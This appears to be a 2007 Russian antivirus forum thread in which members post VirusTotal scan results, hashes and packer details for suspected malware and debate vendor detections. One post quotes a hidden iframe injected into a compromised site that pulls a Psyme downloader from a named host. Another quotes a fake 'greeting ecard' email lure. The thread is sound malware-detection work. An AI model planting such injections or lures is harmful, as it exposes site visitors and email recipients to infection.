MD5: 902499f4ad65093eaa9ae4fefa115235
SHA1: 87364cc8107af30b2a42ccd3b6565662cf33146b
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

----------


## ISO

Complete scanning result of "patch.exe", received in VirusTotal at 01.22.2007, 17:23:45 (CET).
Antivirus	Version	Update	Result
AntiVir	7.3.0.26	01.22.2007	no virus found
Authentium	4.93.8	01.21.2007	no virus found
Avast	4.7.936.0	01.22.2007	no virus found
AVG	386	01.22.2007	no virus found
BitDefender	7.2	01.22.2007	BehavesLike:Trojan.ShellObject
CAT-QuickHeal	9.00	01.22.2007	(Suspicious) - DNAScan
ClamAV	devel-20060426	01.22.2007	no virus found
DrWeb	4.33	01.22.2007	Trojan.PWS.Wmsender
eSafe	7.0.14.0	01.21.2007	no virus found
eTrust-InoculateIT	23.73.119	01.22.2007	no virus found
eTrust-Vet	30.3.3343	01.22.2007	no virus found
Ewido	4.0	01.22.2007	no virus found
Fortinet	2.82.0.0	01.22.2007	suspicious
F-Prot	3.16f	01.21.2007	no virus found
F-Prot4	4.2.1.29	01.21.2007	no virus found
Ikarus	T3.1.0.27	01.22.2007	no virus found
Kaspersky	4.0.2.24	01.22.2007	no virus found
McAfee	4944	01.22.2007	New Win32.g2
Microsoft	1.1904	01.22.2007	no virus found
NOD32v2	1997	01.22.2007	probably a variant of Win32/TrojanDropper.Small.NCP
Norman	5.80.02	01.22.2007	no virus found
Panda	9.0.0.4	01.22.2007	Suspicious file
Prevx1	V2	01.22.2007	no virus found
Sophos	4.13.0	01.20.2007	no virus found
Sunbelt	2.2.907.0	01.22.2007	VIPRE.Suspicious
TheHacker	6.0.3.154	01.22.2007	no virus found
UNA	1.83	01.19.2007	no virus found
VBA32	3.11.2	01.22.2007	Trojan.PWS.Wmsender
VirusBuster	4.3.19:9	01.22.2007	no virus found

Aditional Information
File size: 8704 bytes
MD5: 6573745c6dc2b364977729a3aef35272
SHA1: a30a6de1f2fcdb8ee157c66c0195a585560a76b5
packers: PECRYPT
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

----------


## urbanangel

Complete scanning result of "Web_Money.exe", received in VirusTotal at 01.23.2007, 
18:43:16 (CET).

Antivirus Version Update Result 
AntiVir 7.3.0.26 01.23.2007 TR/Drop.Tiny.M.3 
Authentium 4.93.8 01.22.2007 no virus found 
Avast 4.7.936.0 01.23.2007 no virus found 
AVG 386 01.23.2007 no virus found 
BitDefender 7.2 01.23.2007 no virus found 
CAT-QuickHeal 9.00 01.22.2007 no virus found 
ClamAV devel-20060426 01.23.2007 no virus found 
DrWeb 4.33 01.23.2007 Trojan.MulDrop.5419 
eSafe 7.0.14.0 01.23.2007 Win32.Tiny.m 
eTrust-InoculateIT 23.73.120 01.23.2007 no virus found 
eTrust-Vet 30.3.3344 01.23.2007 no virus found 
Ewido 4.0 01.23.2007 no virus found 
Fortinet 2.82.0.0 01.23.2007 no virus found 
F-Prot 3.16f 01.22.2007 no virus found 
F-Prot4 4.2.1.29 01.22.2007 no virus found 
Ikarus T3.1.0.27 01.23.2007 Trojan-Clicker.Win32.NetBuie.H 
Kaspersky 4.0.2.24 01.23.2007 Trojan-Dropper.Win32.Tiny.m 
McAfee 4947 01.23.2007 no virus found 
Microsoft 1.1904 01.23.2007 no virus found 
NOD32v2 2000 01.23.2007 no virus found 
Norman 5.80.02 01.23.2007 W32/Suspicious_M.gen.dropper 
Panda 9.0.0.4 01.23.2007 Suspicious file 
Prevx1 V2 01.23.2007 no virus found 
Sophos 4.13.0 01.20.2007 no virus found 
Sunbelt 2.2.907.0 01.22.2007 no virus found 
TheHacker 6.0.3.154 01.22.2007 no virus found 
UNA 1.83 01.23.2007 no virus found 
VBA32 3.11.2 01.23.2007 Trojan.MulDrop.5038 
VirusBuster 4.3.19:9 01.23.2007 no virus found 

Aditional Information 
File size: 552972 bytes 
MD5: 34c0a2aade69879dea99a77b41b6a2e7 
SHA1: 6205dfebf30757d2bce2d954522d3b1f7a0b3970

----------


## Winsent

Complete scanning result of "Lena.scr", received in VirusTotal at 01.24.2007, 05:44:59 (CET).


Antivirus	Version	Update	Result

*AntiVir	7.3.0.26	01.23.2007	HEUR/Crypted
Authentium	4.93.8	01.23.2007	Possibly a new variant of W32/HLLI-MewOrleans-based!Maximus
Avast	4.7.936.0	01.23.2007	Win32dpinch-AH*
AVG	386	01.23.2007	no virus found
*BitDefender	7.2	01.24.2007	Generic.PWStealer.C5C991E0
CAT-QuickHeal	9.00	01.22.2007	(Suspicious) - DNAScan*
ClamAV	devel-20060426	01.23.2007	no virus found
*DrWeb	4.33	01.23.2007	MULDROP.PWS.Trojan
eSafe	7.0.14.0	01.23.2007	Win32.LdPinch.bkn*
eTrust-InoculateIT	23.73.121	01.24.2007	no virus found
eTrust-Vet	30.3.3346	01.23.2007	no virus found
*Ewido	4.0	01.23.2007	Trojan.LdPinch.bkn*
Fortinet	2.85.0.0	01.24.2007	no virus found
*F-Prot	3.16f	01.23.2007	Possibly a new variant of W32/HLLI-MewOrleans-based!Maximus
F-Prot4	4.2.1.29	01.23.2007	W32/HLLI-MewOrleans-based!Maximus
Ikarus	T3.1.0.27	01.24.2007	IM-Worm.Win32.Sumom.C
Kaspersky	4.0.2.24	01.24.2007	Trojan-PSW.Win32.LdPinch.bkn*
McAfee	4947	01.23.2007	no virus found
*Microsoft	1.1904	01.24.2007	Win32/Ldpinch
NOD32v2	2001	01.24.2007	probably a variant of Win32/PSW.LdPinch
Norman	5.80.02	01.23.2007	W32/Suspicious_M.gen*
Panda	9.0.0.4	01.24.2007	no virus found
Prevx1	V2	01.24.2007	no virus found
*Sophos	4.13.0	01.24.2007	Mal/Packer
Sunbelt	2.2.907.0	01.22.2007	VIPRE.Suspicious
TheHacker	6.0.3.155	01.24.2007	Trojan/PSW.LdPinch.bkn*
UNA	1.83	01.23.2007	no virus found
*VBA32	3.11.2	01.23.2007	MalwareScope.Trojan-PSW.Pinch.1
VirusBuster	4.3.19:9	01.23.2007	novirusacked/MEW*

Aditional Information
File size: 51181 bytes
MD5: 8733b36ec7c5e66544350599277d942b
SHA1: 791f43d2dd8a1f05a779b031841905a46e443724
packers: MEW
packers: MEW
packers: MEW
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

----------


## Muzzle

из темы http://virusinfo.info/showthread.php?t=11088
патченый  *ntoskrnl.exe
*



> AhnLab-V3	2007.7.14.0	2007.07.17	no virus found
> AntiVir	7.4.0.42	2007.07.17	no virus found
> Authentium	4.93.8	2007.07.18	no virus found
> Avast	4.7.997.0	2007.07.17	no virus found
> AVG	7.5.0.476	2007.07.17	no virus found
> BitDefender	7.2	2007.07.17	no virus found
> CAT-QuickHeal	9.00	2007.07.17	no virus found
> ClamAV	devel-20070416	2007.07.17	no virus found
> DrWeb	4.33	2007.07.18	no virus found
> ...

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## Winsent

File index.rar received on 07.18.2007 08:11:48 (CET)
Current status:   finished 


Antivirus	Version	Last Update	Result

AhnLab-V3	2007.7.18.0	2007.07.18	no virus found
*AntiVir	7.4.0.42	2007.07.17	EXP/VML-Fill.A*
Authentium	4.93.8	2007.07.18	no virus found
Avast	4.7.997.0	2007.07.17	no virus found
AVG	7.5.0.476	2007.07.17	no virus found
BitDefender	7.2	2007.07.17	no virus found
CAT-QuickHeal	9.00	2007.07.17	no virus found
ClamAV	devel-20070416	2007.07.18	no virus found
*DrWeb	4.33	2007.07.18	VBS.PackFor*
eSafe	7.0.15.0	2007.07.17	no virus found
eTrust-Vet	30.8.3790	2007.07.17	no virus found
Ewido	4.0	2007.07.17	no virus found
FileAdvisor	1	2007.07.18	no virus found
*Fortinet	2.91.0.0	2007.07.18	JS/WebAttacker!exploit*
F-Prot	4.3.2.48	2007.07.17	no virus found
*F-Secure	6.70.13030.0	2007.07.17	Trojan-Downloader.JS.Psyme.hu
Ikarus	T3.1.1.8	2007.07.18	Trojan-Downloader.JS.Psyme.hu
Kaspersky	4.0.2.24	2007.07.18	Trojan-Downloader.JS.Psyme.hu
McAfee	5076	2007.07.17	JS/Downloader-AUD
Microsoft	1.2704	2007.07.17	TrojanDownloader:JS/Psyme.gen*
NOD32v2	2404	2007.07.17	no virus found
Norman	5.80.02	2007.07.17	no virus found
Panda	9.0.0.4	2007.07.17	no virus found
*Sophos	4.19.0	2007.07.17	Mal/ObfJS-A*
Sunbelt	2.2.907.0	2007.07.18	no virus found
Symantec	10	2007.07.18	no virus found
*TheHacker	6.1.7.148	2007.07.16	Trojan/Downloader.vbs*
VBA32	3.12.2	2007.07.17	no virus found
*VirusBuster	4.3.23:9	2007.07.17	JS.Psyme.DD.Gen
Webwasher-Gateway	6.0.1	2007.07.17	Exploit.VML-Fill.A*
Aditional information
File size: 3905 bytes
MD5: 7d1cc59e55db21e8599ddf9f58851fbc
SHA1: 1b4de7d587522df2325bbb1178150a2d0b6ff143

----------


## icon

Продолжение предыдущего:
zhestclub. ru
File zhestclub.htm received on 07.18.2007 10:12:25 (CET)
Current status: Loading ...   finished 
Loading server information... 

Print results Antivirus	Version	Last Update	Result
AhnLab-V3	2007.7.18.0	2007.07.18	no virus found
AntiVir	7.4.0.42	2007.07.18	no virus found
Authentium	4.93.8	2007.07.18	no virus found
Avast	4.7.997.0	2007.07.17	no virus found
AVG	7.5.0.476	2007.07.17	no virus found
BitDefender	7.2	2007.07.17	no virus found
CAT-QuickHeal	9.00	2007.07.17	no virus found
ClamAV	devel-20070416	2007.07.18	no virus found
*DrWeb	4.33	2007.07.18	VBS.PackFor*
eSafe	7.0.15.0	2007.07.17	no virus found
eTrust-Vet	30.8.3790	2007.07.17	no virus found
Ewido	4.0	2007.07.17	no virus found
FileAdvisor	1	2007.07.18	no virus found
Fortinet	2.91.0.0	2007.07.18	no virus found
F-Prot	4.3.2.48	2007.07.17	no virus found
F-Secure	6.70.13030.0	2007.07.17	no virus found
Ikarus	T3.1.1.8	2007.07.18	no virus found
Kaspersky	4.0.2.24	2007.07.18	no virus found
McAfee	5076	2007.07.17	no virus found
*Microsoft	1.2704	2007.07.18	TrojanDownloader:JS/Psyme.gen*
NOD32v2	2404	2007.07.17	no virus found
Norman	5.80.02	2007.07.17	no virus found
Panda	9.0.0.4	2007.07.17	no virus found
*Sophos	4.19.0	2007.07.17	Mal/ObfJS-A*
Sunbelt	2.2.907.0	2007.07.18	no virus found
Symantec	10	2007.07.18	no virus found
TheHacker	6.1.7.148	2007.07.16	no virus found
VBA32	3.12.2	2007.07.17	no virus found
*VirusBuster	4.3.23:9	2007.07.17	JS.Agent.B*
*Webwasher-Gateway	6.0.1	2007.07.18 JavaScript.CodeUnfolding.gen!High (suspicious)*
Aditional information
File size: 8413 bytes
MD5: 38ddab82dcea800e2545ef6f7fe2bc1b
SHA1: c87072b1b9ca09ae540d041d711c5353a1839c29

*Добавлено через 4 часа 2 минуты*
Из темы

File realfoto.exe received on 07.18.2007 14:07:57 (CET)
Current status: Loading ...   finished 
Loading server information... 

Print results Antivirus	Version	Last Update	Result
AhnLab-V3	2007.7.18.0	2007.07.18	no virus found
AntiVir	7.4.0.42	2007.07.18	no virus found
Authentium	4.93.8	2007.07.18	no virus found
*Avast	4.7.997.0	2007.07.17	Win32:Small-GYA*
AVG	7.5.0.476	2007.07.17	no virus found
*BitDefender	7.2	2007.07.17	Dropped:Trojan.Downloader.Small.AET*
*CAT-QuickHeal	9.00	2007.07.17	(Suspicious) - DNAScan*
ClamAV	devel-20070416	2007.07.18	no virus found
DrWeb	4.33	2007.07.18	no virus found
eSafe	7.0.15.0	2007.07.17	no virus found
eTrust-Vet	30.8.3791	2007.07.18	no virus found
Ewido	4.0	2007.07.18	no virus found
FileAdvisor	1	2007.07.18	no virus found
Fortinet	2.91.0.0	2007.07.18	no virus found
F-Prot	4.3.2.48	2007.07.17	no virus found
F-Secure	6.70.13030.0	2007.07.18	no virus found
*Ikarus	T3.1.1.8	2007.07.18	Trojan-Downloader.Win32.Small.ehu*
Kaspersky	4.0.2.24	2007.07.18	no virus found
*McAfee	5076	2007.07.17	Generic Downloader*
*Microsoft	1.2704	2007.07.18	TrojanDownloader:Win32/Agent.WX*
*NOD32v2	2404	2007.07.17	probably a variant of Win32/TrojanDownloader.Small.DRU*
Norman	5.80.02	2007.07.18	no virus found
*Panda	9.0.0.4	2007.07.18	Suspicious file*
*Sophos	4.19.0	2007.07.17	Mal/Packer*
*Sunbelt	2.2.907.0	2007.07.18	VIPRE.Suspicious*
Symantec	10	2007.07.18	no virus found
TheHacker	6.1.7.148	2007.07.16	no virus found
*VBA32	3.12.2	2007.07.17	Trojan.Win32.TrojanDownloader.Small.DRU*
VirusBuster	4.3.23:9	2007.07.17	
*Webwasher-Gateway	6.0.1	2007.07.18	Packer.FSG*
Aditional information
File size: 2625 bytes
MD5: ba0b2e8dc204a4b227a3b106070b76d3
SHA1: 0794eb98b6013c452c6b0a770e7a672005d91b82
packers: FSG
packers: FSG
packers: FSG
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

----------


## DVi

> Продолжение предыдущего:
> zhestclub. ru
> File zhestclub.htm received on 07.18.2007 10:12:25 (CET)
> 
> *DrWeb    4.33    2007.07.18    VBS.PackFor*


Позволю себе усомниться в этом детекте. Все, что делает этот "вредоносный скрипт", это пишет в документ строку


```
<iframe src='http://bsdpng.info/error/' width=1 height=1 style='visibility: hidden;'></iframe>
```

, то есть является пускачом для расположенного по указанному адресу классического Psyme. Сам по себе этот скрипт безвреден. По сути, мы наблюдаем классический инжект в сайт, а DrWeb положил маску на яваскрипт-пакер. Вот такие детекты являются более правильными (хотя все равно - некорректными для статистики Вирусинфо):



> *Microsoft    1.2704    2007.07.18    TrojanDownloader:JS/Psyme.gen*
> *Sophos    4.19.0    2007.07.17    Mal/ObfJS-A*
> *VirusBuster    4.3.23:9    2007.07.17    JS.Agent.B*
> *Webwasher-Gateway    6.0.1    2007.07.18 JavaScript.CodeUnfolding.gen!High (suspicious)*

----------


## XL

> File ecard.exe received on 07.19.2007 21:15:51 (CET)
> Current status:    finished 
> 
> Print results Antivirus	Version	Last Update	Result
> AhnLab-V3	2007.7.20.0	2007.07.19	no virus found
> *AntiVir	7.4.0.44	2007.07.19	WORM/Zhelatin.Gen*
> Authentium	4.93.8	2007.07.19	no virus found
> *Avast	4.7.997.0	2007.07.19	Win32:Tibs-BBG*
> AVG	7.5.0.476	2007.07.19	no virus found
> ...


Седьмой KIS последнего билда тоже не детектит в режиме максимальной эвристики, хотя еще пару дней назад файлы из аналогичных писем ловились как *trojan.generic*
А писем такого рода приходит по 5-10 шт. в день:



> Hi. School mate has sent you a greeting ecard.
> See your card as often as you wish during the next 15 days.
> 
> SEEING YOUR CARD
> 
> If your email software creates links to Web pages, click on your card's direct www address below while you are connected to the Internet:
> 
> http://72.230.33.160/*****************
> 
> ...

----------


## Helgin

В защиту Microsoft -)

Antivirus 			Version 			Last Update 			Result 		 	
AhnLab-V32007.7.20.02007.07.19no virus found 
*AntiVir**7.4.0.44**2007.07.19**WORM/Zhelatin.Gen*
Authentium4.93.82007.07.19no virus found
*Avast**4.7.997.0**2007.07.19**Win32:Tibs-BBG*
AVG7.5.0.4762007.07.18no virus found
*BitDefender**7.2**2007.07.19**Trojan.Peed.IAM*
CAT-QuickHeal9.002007.07.19(Suspicious) - DNAScan
ClamAVdevel-200704162007.07.19 no virus found
DrWeb4.332007.07.19no virus found
*eSafe**7.0.15.0**2007.07.17**Suspicious Trojan/Worm*
*eTrust-Vet**30.8.3794**2007.07.19**Win32/Sintun*
Ewido4.02007.07.19no virus found
FileAdvisor12007.07.19no virus found
Fortinet2.91.0.02007.07.19no virus found
F-Prot4.3.2.482007.07.19no virus found
F-Secure6.70.13030.02007.07.19no virus found
IkarusT3.1.1.82007.07.19no virus found
Kaspersky4.0.2.242007.07.19no virus found
McAfee50782007.07.19no virus found
*Microsoft**1.2704**2007.07.19**TrojanDropper:Win32/Tibs.O*
NOD32v224072007.07.19no virus found
Norman5.80.022007.07.19no virus found
Panda9.0.0.42007.07.19no virus found
*Sophos**4.19.0**2007.07.17**Mal/Dorf-A*
Sunbelt2.2.907.02007.07.19no virus found
*Symantec**10**2007.07.19**Trojan.Packed.13*
TheHacker6.1.7.1492007.07.18no virus found
VBA323.12.2.12007.07.19no virus found
VirusBuster4.3.26:92007.07.19no virus found
*Webwasher-Gateway**6.0.1**2007.07.19**Worm.Zhelatin.Gen*

----------


## mayas

поймал ручками в \system32\drivers

File firelm01.sys received on 07.21.2007 11:37:32 (CET)

Antivirus 	Version 	Last Update 	Result
AhnLab-V3	2007.7.21.0	2007.07.20	no virus found
AntiVir	7.4.0.44	2007.07.20	no virus found
Authentium	4.93.8	2007.07.20	no virus found
Avast	4.7.997.0	2007.07.20	no virus found
AVG	7.5.0.476	2007.07.20	no virus found
BitDefender	7.2	2007.07.21	no virus found
CAT-QuickHeal	9.00	2007.07.20	no virus found
ClamAV	devel-20070416	2007.07.21	no virus found
DrWeb	4.33	2007.07.21	no virus found
eSafe	7.0.15.0	2007.07.19	no virus found
eTrust-Vet	30.8.3797	2007.07.20	no virus found
Ewido	4.0	2007.07.21	no virus found
FileAdvisor	1	2007.07.21	no virus found
Fortinet	2.91.0.0	2007.07.21	no virus found
F-Prot	4.3.2.48	2007.07.20	no virus found
F-Secure	6.70.13030.0	2007.07.20	no virus found
Ikarus	T3.1.1.8	2007.07.21	no virus found
*Kaspersky	4.0.2.24	2007.07.21	Backdoor.Win32.Hackdoor.g*
McAfee	5079	2007.07.20	no virus found
Microsoft	1.2704	2007.07.21	no virus found
NOD32v2	2410	2007.07.20	no virus found
Norman	5.80.02	2007.07.20	no virus found
Panda	9.0.0.4	2007.07.20	no virus found
Sophos	4.19.0	2007.07.17	no virus found
Sunbelt	2.2.907.0	2007.07.21	no virus found
Symantec	10	2007.07.21	no virus found
TheHacker	6.1.7.150	2007.07.21	no virus found
VBA32	3.12.2.1	2007.07.21	no virus found
VirusBuster	4.3.26:9	2007.07.20	no virus found
Webwasher-Gateway	6.0.1	2007.07.21	no virus found

Additional information
File size: 32855 bytes
MD5: 98638f2f168f5856d11083c1f5843ba2
SHA1: 9cc547244ffaf8c4a1d43abdd2a742f47c8295cd

add:


> мой пост http://virusinfo.info/showpost.php?p...&postcount=227
> ошибка вирусного аналитика ЛК (я отослал в вирлаб, пришел ответ что найдено новое вредоносное программное обеспечение)а это компонент файрвола

----------


## Макcим

File avz00001.dta received on 07.21.2007 13:12:23 (CET)


> AhnLab-V3	2007.7.21.0	2007.07.20	no virus found
> AntiVir	7.4.0.44	2007.07.20	no virus found
> Authentium	4.93.8	2007.07.20	no virus found
> Avast	4.7.997.0	2007.07.20	no virus found
> AVG	7.5.0.476	2007.07.20	no virus found
> *BitDefender	7.2	2007.07.21	Trojan.Rootkit.Loader.A*
> CAT-QuickHeal	9.00	2007.07.20	no virus found
> ClamAV	devel-20070416	2007.07.21	no virus found
> DrWeb	4.33	2007.07.21	no virus found
> ...

----------


## Muffler

File bcqr00001.dat received on 07.21.2007 21:25:06 (CET)



> Antivirus  	Version  	Last Update  	Result
> AhnLab-V3	2007.7.21.0	2007.07.20	no virus found
> AntiVir	7.4.0.44	2007.07.21	no virus found
> Authentium	4.93.8	2007.07.20	no virus found
> Avast	4.7.997.0	2007.07.20	no virus found
> AVG	7.5.0.476	2007.07.21	no virus found
> BitDefender	7.2	2007.07.21	no virus found
> CAT-QuickHeal	9.00	2007.07.20	no virus found
> ClamAV	devel-20070416	2007.07.21	no virus found
> ...


Additional information
File size: 61114 bytes
MD5: 8c1d95da9e9085b8c2b13556b3dd95d3
SHA1: 28a2dce0dfd8355c5f011c6c0ab03e2df1bb896e
Sunbelt info: Backdoor.Rustock is a threat that acts as a hidden proxy and enables an attacker to send spam from the machine.

*Добавлено через 3 часа 21 минуту*
File avz00002.dta received on 07.22.2007 00:45:31 (CET)




> Antivirus  	Version  	Last Update  	Result
> AhnLab-V3	2007.7.21.0	2007.07.20	no virus found
> *AntiVir	7.4.0.44	2007.07.21	TR/Rootkit.Gen*
> Authentium	4.93.8	2007.07.20	no virus found
> *Avast	4.7.997.0	2007.07.20	Win32:Trojan-gen. {Other}*
> AVG	7.5.0.476	2007.07.21	no virus found
> *BitDefender	7.2	2007.07.21	Backdoor.Rustock.B*
> CAT-QuickHeal	9.00	2007.07.20	no virus found
> ClamAV	devel-20070416	2007.07.22	no virus found
> ...


Additional information
File size: 80488 bytes
MD5: 95a506f62ce73818fa6e27d1c052b711
SHA1: 6d880bc775e46e0a26859003dcfb44b26e076276
Sunbelt info: Backdoor.Rustock is a threat that acts as a hidden proxy and enables an attacker to send spam from the machine.

----------


## Winsent

File 1.exe received on 07.22.2007 10:10:16 (CET)

Antivirus  	Version  	Last Update  	Result
AhnLab-V3	2007.7.21.0	2007.07.20	no virus found
*AntiVir	7.4.0.44	2007.07.21	HEUR/Malware*
Authentium	4.93.8	2007.07.20	no virus found
*Avast	4.7.997.0	2007.07.22	Win32elf-CAT*
AVG	7.5.0.476	2007.07.21	no virus found
BitDefender	7.2	2007.07.22	no virus found
*CAT-QuickHeal	9.00	2007.07.20	(Suspicious) - DNAScan*
ClamAV	devel-20070416	2007.07.22	no virus found
DrWeb	4.33	2007.07.21	no virus found
eSafe	7.0.15.0	2007.07.19	no virus found
eTrust-Vet	30.8.3797	2007.07.20	no virus found
Ewido	4.0	2007.07.21	no virus found
FileAdvisor	1	2007.07.22	no virus found
Fortinet	2.91.0.0	2007.07.22	no virus found
F-Prot	4.3.2.48	2007.07.20	no virus found
F-Secure	6.70.13030.0	2007.07.21	no virus found
*Ikarus	T3.1.1.8	2007.07.22	Trojan-PWS.Win32.Kapod*
Kaspersky	4.0.2.24	2007.07.22	no virus found
McAfee	5079	2007.07.20	no virus found
Microsoft	1.2704	2007.07.22	no virus found
NOD32v2	2411	2007.07.21	no virus found
Norman	5.80.02	2007.07.20	no virus found
*Panda	9.0.0.4	2007.07.22	Suspicious file*
Sophos	4.19.0	2007.07.17	no virus found
*Sunbelt	2.2.907.0	2007.07.21	VIPRE.Suspicious*
Symantec	10	2007.07.22	no virus found
TheHacker	6.1.7.150	2007.07.21	no virus found
VBA32	3.12.2.1	2007.07.21	no virus found
VirusBuster	4.3.26:9	2007.07.21	no virus found
*Webwasher-Gateway	6.0.1	2007.07.22	Heuristic.Malware*


Additional information
File size: 264192 bytes
MD5: 849f0a1fcbfc7752368131947228790d
SHA1: 33d8313e504f36cbd8a45ea1de5a92d50b95c37f
packers: ASProtect
packers: PE_Patch, Aspack
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

----------


## kvit

Antivirus Version Last Update Result 
AhnLab-V3 2007.7.25.0 2007.07.24 no virus found 
AntiVir 7.4.0.44 2007.07.24 no virus found 
Authentium 4.93.8 2007.07.25 no virus found 
*Avast 4.7.997.0 2007.07.25 Win32:Trojan-gen. {Other} 
AVG 7.5.0.476 2007.07.25 Downloader.Zlob.HN 
BitDefender 7.2 2007.07.25 Trojan.Downloader.Zlob.AAEE* 
CAT-QuickHeal 9.00 2007.07.24 no virus found 
ClamAV devel-20070416 2007.07.25 no virus found 
DrWeb 4.33 2007.07.25 no virus found 
eSafe 7.0.15.0 2007.07.24 no virus found 
eTrust-Vet 31.1.5003 2007.07.24 no virus found 
Ewido 4.0 2007.07.24 no virus found 
FileAdvisor 1 2007.07.25 no virus found 
Fortinet 2.91.0.0 2007.07.25 no virus found 
F-Prot 4.3.2.48 2007.07.25 no virus found 
*F-Secure 6.70.13030.0 2007.07.25 Trojan-Downloader.Win32.Zlob.bxn* 
Ikarus T3.1.1.8 2007.07.24 no virus found 
*Kaspersky 4.0.2.24 2007.07.25 Trojan-Downloader.Win32.Zlob.bxn* 
McAfee 5081 2007.07.24 no virus found 
*Microsoft 1.2704 2007.07.25 TrojanDownloader:Win32/Zlob* 
NOD32v2 2418 2007.07.25 no virus found 
*Norman 5.80.02 2007.07.24 DNSChanger.gen10* 
Panda 9.0.0.4 2007.07.24 no virus found 
*Sophos 4.19.0 2007.07.17 Mal/Zlob-A* 
Sunbelt 2.2.907.0 2007.07.25 no virus found 
Symantec 10 2007.07.25 no virus found 
TheHacker 6.1.7.152 2007.07.23 no virus found 
VBA32 3.12.2.1 2007.07.24 no virus found 
VirusBuster 4.3.26:9 2007.07.24 no virus found 
Webwasher-Gateway 6.0.1 2007.07.25 no virus found 

*Добавлено через 2 минуты*
+ тоже самое с сайта Касперского

Проверенный файл:   setup.exe - Инфицирован 

setup.exe/stream/Script - в порядке
setup.exe/stream/data0001 - в порядке
setup.exe/stream/data0002 - в порядке
setup.exe/stream/data0003 - в порядке
setup.exe/stream/data0004 - в порядке
setup.exe/stream/data0005 - в порядке
*setup.exe/stream/data0006 - инфицирован Trojan-Downloader.Win32.Zlob.bxn* 
setup.exe/stream/data0007 - в порядке
setup.exe/stream/data0008 - в порядке

----------


## Muffler

File svc.exe received on 07.26.2007 06:25:17 (CET)




> Antivirus  	Version  	Last Update  	Result
> AhnLab-V3	2007.7.26.0	2007.07.25	no virus found
> *AntiVir	7.4.0.50	2007.07.25	HEUR/Crypted*
> Authentium	4.93.8	2007.07.25	no virus found
> Avast	4.7.997.0	2007.07.26	no virus found
> AVG	7.5.0.476	2007.07.25	no virus found
> BitDefender	7.2	2007.07.26	no virus found
> *CAT-QuickHeal	9.00	2007.07.25	(Suspicious) - DNAScan*
> ClamAV	0.91	2007.07.26	no virus found
> ...


Additional information
File size: 4538 bytes
MD5: a5da3a9c3b0e2b5034b3ec49cbb3a60f
SHA1: 2dca577caf641a2b4e3972902b65b7b1342fab34

----------


## Kuzz

http://virusinfo.info/showthread.php?t=11350




> Antivirus  	Version  	Last Update  	Result
> AhnLab-V3	2007.7.27.0	2007.07.26	-
> AntiVir	7.4.0.50	2007.07.26	-
> Authentium	4.93.8	2007.07.25	-
> Avast	4.7.997.0	2007.07.26	-
> AVG	7.5.0.476	2007.07.26	PSW.Generic4.ZKV
> BitDefender	7.2	2007.07.26	MemScan:Trojan.Spy.Nuklus.D
> CAT-QuickHeal	9.00	2007.07.25	-
> ClamAV	0.91	2007.07.26	-
> ...





> Antivirus  	Version  	Last Update  	Result
> AhnLab-V3	2007.7.27.0	2007.07.26	-
> AntiVir	7.4.0.50	2007.07.26	BDS/Afcore.cb.2.B
> Authentium	4.93.8	2007.07.25	-
> Avast	4.7.997.0	2007.07.26	-
> AVG	7.5.0.476	2007.07.26	-
> BitDefender	7.2	2007.07.26	-
> CAT-QuickHeal	9.00	2007.07.25	-
> ClamAV	0.91	2007.07.26	-
> ...

----------


## Muffler

File _________________________________ received on 07.26.2007 16:57:15




> Antivirus  	Version  	Last Update  	Result
> AhnLab-V3	2007.7.27.0	2007.07.26	-
> AntiVir	7.4.0.50	2007.07.26	-
> Authentium	4.93.8	2007.07.25	-
> Avast	4.7.997.0	2007.07.26	-
> AVG	7.5.0.476	2007.07.26	-
> BitDefender	7.2	2007.07.26	-
> CAT-QuickHeal	9.00	2007.07.25	-
> ClamAV	0.91	2007.07.26	-
> ...


Additional information
File size: 21071 bytes
MD5: 03bfb34583fcd2b913f4bb9be182bc3f
SHA1: a47e0e7bc5ee907faba6a69f4a1cc65f76a8f06d

----------


## V_Bond

AhnLab-V3	2007.7.27.0	2007.07.26	-
AntiVir	7.4.0.50	2007.07.26	-
Authentium	4.93.8	2007.07.25	-
*Avast	4.7.997.0	2007.07.26	Win32:Spyware-gen.*
AVG	7.5.0.476	2007.07.26	-
*BitDefender	7.2	2007.07.26	Application.Cool.Remote.Control.1.2*
CAT-QuickHeal	9.00	2007.07.26	-
ClamAV	0.91	2007.07.26	-
DrWeb	4.33	2007.07.26	-
eSafe	7.0.15.0	2007.07.24	-
eTrust-Vet	31.1.5008	2007.07.26	-
Ewido	4.0	2007.07.26	-
FileAdvisor	1	2007.07.26	-
Fortinet	2.91.0.0	2007.07.26	-
F-Prot	4.3.2.48	2007.07.25	-
F-Secure	6.70.13030.0	2007.07.26	-
Ikarus	T3.1.1.8	2007.07.26	-
Kaspersky	4.0.2.24	2007.07.26	-
McAfee	5084	2007.07.26	-
*Microsoft	1.2704	2007.07.26	RemoteAccess:Win32/CoolRemoteControl*
NOD32v2	2423	2007.07.26	-
Norman	5.80.02	2007.07.26	-
*Panda	9.0.0.4	2007.07.26	Generic Malware*
Rising	19.33.32.00	2007.07.26	-
Prevx1	V2	2007.07.26	-
Sophos	4.19.0	2007.07.26	-
Sunbelt	2.2.907.0	2007.07.26	-
Symantec	10	2007.07.26	-
TheHacker	6.1.7.154	2007.07.26	-
VBA32	3.12.2.1	2007.07.24	-
VirusBuster	4.3.26:9	2007.07.26	-
Webwasher-Gateway	6.5.3	2007.07.26	-
Additional information
File size: 29184 bytes
MD5: 28ff05b83f852ed13bc49f50945651ea
SHA1: 69605f13837c698ca323484fab46bc11146acdb4

----------


## Winsent

File 1.scr received on 07.27.2007 16:12:33 (CET)


Antivirus	Version	Last Update	Result

AhnLab-V3	2007.7.28.0	2007.07.27	-
*AntiVir	7.4.0.50	2007.07.27	TR/Crypt.XPACK.Gen*
Authentium	4.93.8	2007.07.27	-
Avast	4.7.997.0	2007.07.27	-
AVG	7.5.0.476	2007.07.27	-
*BitDefender	7.2	2007.07.27	Trojan.PWS.LDPinch.TAW
CAT-QuickHeal	9.00	2007.07.26	(Suspicious) - DNAScan*
ClamAV	0.91	2007.07.27	-
DrWeb	4.33	2007.07.27	-
